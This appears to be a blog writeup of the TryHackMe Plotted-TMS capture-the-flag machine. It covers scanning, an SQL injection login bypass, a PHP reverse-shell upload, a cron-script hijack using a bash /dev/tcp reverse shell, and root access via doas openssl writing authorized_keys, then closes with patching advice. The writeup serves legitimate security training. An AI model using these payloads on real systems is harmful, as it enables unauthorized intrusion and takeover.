d3vyce
095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
118 lines
3.7 KiB
Markdown
118 lines
3.7 KiB
Markdown
---
|
|
title: "Writeup - Plotted-TMS (THM)"
|
|
date: 2022-03-31
|
|
slug: "writeup-plotted-tms-thm"
|
|
type: "writeup-ctf"
|
|
---
|
|
|
|
This is a writeup for the [Plotted-TMS](https://tryhackme.com/room/plottedtms) machine from the TryHackMe site.
|
|
|
|
## Enumeration
|
|
|
|
First, let's start with a scan of our target with the following command:
|
|
|
|
|
|
```bash
|
|
nmap -sV -T4 -Pn 10.10.173.55
|
|
```
|
|
Three TCP ports are discovered:
|
|
|
|
|
|
|
|
- 22/tcp : SSH port (OpenSSH 8.2)
|
|
- 80/tcp : HTTP web server (Apache 2.4.41)
|
|
- 445/tcp : HTTP web server (Apache 2.4.41)
|
|
|
|
## Exploit
|
|
|
|
I start by listing the directories of the site hosted on port 445:
|
|
|
|
|
|
|
|
We find a `management` page that gives us access to an admin login page.
|
|
|
|
|
|
|
|
After a few injection tests I finally managed to connect with the following injection:
|
|
|
|
|
|
```bash
|
|
Username = ' or 1=1;-- -
|
|
```
|
|
I now have access to the admin panel of the site.
|
|
|
|
|
|
|
|
In this panel I find the `Settings` page. This page allows to change the font image of the home page of the site. So I try to send a PHP reverse shell.
|
|
|
|
|
|
|
|
Then I access it via the following address:
|
|
|
|
|
|
```bash
|
|
http://10.10.173.55:445/management/uploads/
|
|
```
|
|
I now have a reverse shell with the user `www-data`.
|
|
|
|
|
|
|
|
After some research I find that the first flag is in the personal folder of the user `plot_admin`, problem I do not have the right to read it. So I will have to find a way to change the user.
|
|
|
|
|
|
|
|
After launching [linPeas](https://linpeas.sh) on the machine I find that every minute a script backup.sh is launched by the user `plot_admin`.
|
|
|
|
|
|
|
|
I don't have the permissions to change the content of the script, but I have the permissions to change the content of the `/var/www/scripts` folder. So I will be able to replace the current script, by a custom script allowing me to have a reverse shell as `plot_admin`.
|
|
|
|
To do this I use the following commands:
|
|
|
|
|
|
```bash
|
|
mv backup.sh tmp
|
|
touch backup.sh
|
|
echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh
|
|
chmod +x backup.sh
|
|
```
|
|
|
|
|
|
I now have a reverse shell with the user `plot_admin` and I can get the first flag.
|
|
|
|
## Privilege escalation
|
|
|
|
I start by listing the SUID files with the following command:
|
|
|
|
|
|
```bash
|
|
find / -perm -u=s -type f 2>/dev/null
|
|
```
|
|
I found a command not very common: [doas](https://man.openbsd.org/doas). This command is an alternative to the `sudo` command. After some research I find on this [site](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) that the config file of this command is at the following address: `/etc/doas.conf`.
|
|
|
|
|
|
|
|
I find that my user can execute the `openssl` command with admin rights. So I'm looking on [GTFOBins](https://gtfobins.github.io/gtfobins/openssl/) for exploits related to this command.
|
|
|
|
I find that it is possible to write in files, so I will be able to add to ssh key in the `authorized_keys` file and then connect via SSH to the root account.
|
|
|
|
To do this I use the following commands:
|
|
|
|
|
|
```bash
|
|
FILE=/root/.ssh/authorized_keys
|
|
echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE"
|
|
```
|
|
|
|
|
|
I now have a shell `root` shell and can retrieve the last flag.
|
|
|
|
## Recommendations
|
|
|
|
To patch this host I think it would be necessary to perform a number of actions:
|
|
|
|
- Fix the site code to avoid SQL injections ([OWASP SQL Injection](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html))
|
|
- Implement code detection in the admin panel image uploads
|
|
- Store CRON scripts in a folder accessible only by the author
|
|
- Do not allow root rights on commands that do not require it
|